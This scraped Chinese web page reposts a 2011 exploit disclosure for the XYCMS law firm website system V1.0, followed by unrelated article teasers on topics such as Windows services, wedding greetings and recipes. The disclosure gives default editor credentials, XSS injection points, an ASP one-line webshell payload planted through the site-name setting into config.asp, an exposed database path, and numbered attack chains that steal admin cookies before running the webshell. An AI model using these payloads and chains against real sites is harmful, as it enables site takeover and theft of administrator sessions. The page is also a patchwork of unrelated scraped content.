首页 > 教育资源 > 资料大全

XYCMS律师事务所建站系统 V1.0多处缺陷漏洞预警 -电脑资料

如花美眷分享2016-02-06 05:23:16 次阅读

#########################################

# XYCMS律师事务所建站系统 V1.0#

# http://down.admin5.com/asp/71909.html #

# B0mbErM@n ; 2011-2-18#

#########################################

############### eWebEditor ##############

http://127.0.0.1:99/system/xyeWebEditor/admin/login.asp

User=XY2010Pass=XY2010

##################XSS#################

http://127.0.0.1:99/online.asp

Qq:[XSS]

Mail:[XSS]

Photo:[XSS]

Contents:[XSS]

################## Eval #################

http://127.0.0.1:99/system/admin_setup.asp

WebName:<% eval request("pass")%>

http://127.0.0.1:99/inc/config.asp

##################MDB

#################

http://127.0.0.1:99/xydata/xycms.mdb

################# Hacking ################

1:eWebEditor

2:XSS+Eval

(1)标题和姓名写的真实些

(2)插入XSS获取后台路径以及cookie

(3)Eval

3:MDB+Eval

(1)MDB

(2)Eval

4:XSS+MDB+Eval

(1)MDB

(2)XSS-标题和姓名写的真实些

(3)插入XSS获取后台路径

(4)Eval

相关文章

workstation服务无法启动解决办法

workstation服务如果无法启动，网络共享和网络打印机都是无法使用的。以下是I小编收集的workstation服务无法启动解决办法，下面是小编带来的workstation服务无法启动解决办法，希...

资料大全2017-04-04

workstation服务无法启动解决办法

小学生对的展望

小学生对2017的展望12016已经悄悄从我们的指缝中溜走了，迎来了新的一年——2017。在2016年，我常想：猴年会是什么样子的?2016是我的本命年，我总想过好那一年。可现在，我太还怀念2016了...

资料大全2014-07-03

小学生对的展望

新婚祝词四字

第一组：凤凰于飞美满家园琴瑟合鸣相敬如宾同德同心如鼓琴瑟花开并蒂缔结良缘缘订三生成家之始鸳鸯壁合文定吉祥姻缘相配白首成约终身之盟盟结良缘神仙眷属新婚志喜...

资料大全2011-09-07

新婚祝词四字

北京居住证

北京居住证申请人资格要求所学专业或岗位属于北京市急需专业或岗位，且具备下列条件的人员可申请北京市工作居住证：(1)符合规定条件的申报单位连续聘用满6个月以上;(2)具有2年以上工作经历...

资料大全2014-05-05

北京居住证

建筑施工单位疫情复工复产方案

为确保事情或工作高质量高水平开展，时常需要预先开展方案准备工作，方案指的是为某一次行动所制定的计划类文书。优秀的方案都具备一些什么特点呢？下面是小编精心整理的建筑施工单位疫情复工复产方案，仅供参考，欢...

资料大全2014-07-03

建筑施工单位疫情复工复产方案

远志大枣汤的做法有几种

一些白领工作时间长了总会出现一些头脑疼痛的情况，长期的头脑发胀肯定是要生病了，而且是某一些疾病的前兆的，平时一定要预防头痛病还是要大补的，有的人喜欢喝远志大枣汤，因为这个汤营养价值很高，而且能够抵御头...

资料大全2019-09-08

远志大枣汤的做法有几种